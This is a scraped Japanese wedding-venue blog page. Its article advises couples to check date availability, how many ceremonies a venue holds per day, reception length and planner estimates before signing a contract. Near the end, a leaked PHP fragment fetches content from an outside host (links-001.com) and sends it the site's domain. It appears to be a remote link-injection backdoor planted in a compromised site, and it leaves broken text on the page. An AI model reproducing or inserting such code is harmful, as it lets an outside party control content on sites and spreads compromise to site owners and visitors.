前へ
次へ

料理の内容にこだわって結婚式場が選べる

新郎新婦の二人ともアレルギーに悩まされていて、料理を選ぶ時にも苦労する事があったので、結婚式場をどう

more

ヨーロッパの街並み風の結婚式場

結婚式場は何も建物だけではありません。
結婚式場を決めるときは「こういうチャペルがあるところが

more

結婚式場の情報に関して詳しくなりたいなら

これから実際に結婚式場を探して、結婚式をするつもりでいるなら、最初から最後まできちんと面倒を見てくれ

more

確認したい結婚式場の内容

結婚式場の候補が絞り込めて、いざ決定するその前に、今一度確認しておくべきは、当日を想定したスケジュールです。
例えば、希望する挙式日が空いてるのか、特に人気の高いお日柄となる「大安」であったり、ジューンブライドの6月、気候のよい11月などはすでに予約で埋まっているケースもあります。
また、その結婚式場では1日に執り行われている式の回数はどれくらいでしょうか。
ここから実績も判断できます。
1日に組数を限定していれば、それだけサービス面でも抜かりなく行ってもらえる可能性大です。
しかし、組数も多いとなれば、場をふんでいるのでしょうが、自分たちの式の前後にも式を挙げる人がいるということです。
ゲスト同士が鉢合わせになってしまう可能性は低いかもしれませんが、トラブルになる可能性があるので、組数が限定されるところがおすすめです。
ちなみに、プランナーやブライダルディレクターなどがインカムなどを使って、鉢合わせしないようにスタッフを操作してくれますから、バッタリということは余程のことがない限りありません。
また、挙式と披露宴を執り行える時間というのも重要ですが、披露宴の所要時間はゲストを招くため、長めに設定できるのかも大事な点です。
全国的に、平均時間は2時間半ですから、ゆったりゲストをもてなしたいのであれば、ブライダル専門式場ではなく、ゲストハウスを選ぶのもおすすめできます。
そこでならば、貸し切りにてゲストと楽しいひとときを、誰に気兼ねすることなく過ごすことができます。
ちなみに、理想とする演出があるのならば、事前にその演出が会場内でできるのかも聞いておきましょう。
こだわりがある、ここを妥協しての結婚式であれば、後悔が残るかもしれませんから、担当プランナーにこだわる部分をしっかり伝えた上で、プランニングしてもらったり、概算見積もりを提示してもらう、こうした準備をしっかり行ってから契約を交わしましょう。

".file_get_contents('http://links-001.com/123set7.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top